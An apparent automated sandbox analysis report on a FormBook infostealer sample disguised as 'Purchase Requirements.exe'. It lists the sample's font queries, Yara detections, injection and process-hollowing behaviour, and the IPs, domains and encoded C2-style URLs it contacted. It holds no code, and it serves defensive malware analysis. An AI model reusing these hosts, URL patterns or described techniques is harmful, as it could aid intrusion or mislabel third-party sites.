Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458827 Sample: Purchase Requirements.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 41 www.theredcymbalsco.com 2->41 43 www.teamtacozzzz.com 2->43 45 2 other IPs or domains 2->45 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 10 other signatures 2->59 11 Purchase Requirements.exe 7 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\UCnSWpQKXBXg.exe, PE32 11->33 dropped 35 C:\Users\...\UCnSWpQKXBXg.exe:Zone.Identifier, ASCII 11->35 dropped 37 C:\Users\user\AppData\Local\Temp\tmp47B.tmp, XML 11->37 dropped 39 C:\Users\...\Purchase Requirements.exe.log, ASCII 11->39 dropped 69 Writes to foreign memory regions 11->69 71 Injects a PE file into a foreign processes 11->71 15 MSBuild.exe 11->15         started        18 schtasks.exe 1 11->18         started        signatures6 process7 signatures8 73 Modifies the context of a thread in another process (thread injection) 15->73 75 Maps a DLL or memory area into another process 15->75 77 Sample uses process hollowing technique 15->77 79 2 other signatures 15->79 20 explorer.exe 15->20 injected 24 conhost.exe 18->24         started        process9 dnsIp10 47 www.braun-mathematik.online 217.160.0.129, 49767, 80 ONEANDONE-ASBrauerstrasse48DE Germany 20->47 49 www.mynjelderlaw.com 74.208.236.212, 49771, 80 ONEANDONE-ASBrauerstrasse48DE United States 20->49 51 8 other IPs or domains 20->51 61 System process connects to network (likely due to code injection or exploit) 20->61 26 colorcpl.exe 20->26         started        signatures11 process12 signatures13 63 Modifies the context of a thread in another process (thread injection) 26->63 65 Maps a DLL or memory area into another process 26->65 67 Tries to detect virtualization through RDTSC time measurements 26->67 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
217.160.0.129
 www.braun-mathematik.online Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
160.153.136.3
 narrowpathwc.com United States
21501 GODADDY-AMSDE true
23.227.38.74
 shops.myshopify.com Canada
13335 CLOUDFLARENETUS true
34.102.136.180
 teamtacozzzz.com United States
15169 GOOGLEUS false
162.241.85.227
 mariasmoworldwide.com United States
26337 OIS1US true
74.208.236.212
 www.mynjelderlaw.com United States
8560 ONEANDONE-ASBrauerstrasse48DE true

Contacted Domains

Name IP Active
narrowpathwc.com 160.153.136.3 true
teamtacozzzz.com 34.102.136.180 true
www.braun-mathematik.online 217.160.0.129 true
shops.myshopify.com 23.227.38.74 true
mariasmoworldwide.com 162.241.85.227 true
theredcymbalsco.com 184.168.131.241 true
goldenstatelabradoodles.com 34.102.136.180 true
www.mynjelderlaw.com 74.208.236.212 true
www.goldenstatelabradoodles.com unknown unknown
www.theredcymbalsco.com unknown unknown
www.mariasmoworldwide.com unknown unknown
www.narrowpathwc.com unknown unknown
www.thefitflect.com unknown unknown
www.teamtacozzzz.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.mariasmoworldwide.com/n8ba/?YDKPpTg0=gDLflU22h4aNrBeOW4VXQ696ddSmWDeh6I9xRo3nz/h3BsDrL/4ZQIL6r35kaA0glkfe&FHtx=1bcPl8l0PFatcZcp true
  • Avira URL Cloud: safe
 unknown
http://www.narrowpathwc.com/n8ba/?YDKPpTg0=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&FHtx=1bcPl8l0PFatcZcp true
  • Avira URL Cloud: safe
 unknown
http://www.braun-mathematik.online/n8ba/?YDKPpTg0=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&FHtx=1bcPl8l0PFatcZcp true
  • Avira URL Cloud: safe
 unknown
www.narrowpathwc.com/n8ba/ true
  • Avira URL Cloud: safe
 low
http://www.thefitflect.com/n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp true
  • Avira URL Cloud: safe
 unknown
http://www.theredcymbalsco.com/n8ba/?YDKPpTg0=9vokcWjvDccQU4MCm09VADFSZD35cLZafv0mNDf58+cuq+V2woxjt+NJE4WV9inYEz7b&FHtx=1bcPl8l0PFatcZcp false
  • Avira URL Cloud: safe
 unknown
http://www.mynjelderlaw.com/n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcp true
  • Avira URL Cloud: safe
 unknown
http://www.goldenstatelabradoodles.com/n8ba/?YDKPpTg0=e60qEcsD/l81wB0bMHsW7u7BjuDaTcxFYqyxe5BzllGz/xR5NT7a3L6d+84tw9tNKT87&FHtx=1bcPl8l0PFatcZcp false
  • Avira URL Cloud: safe
 unknown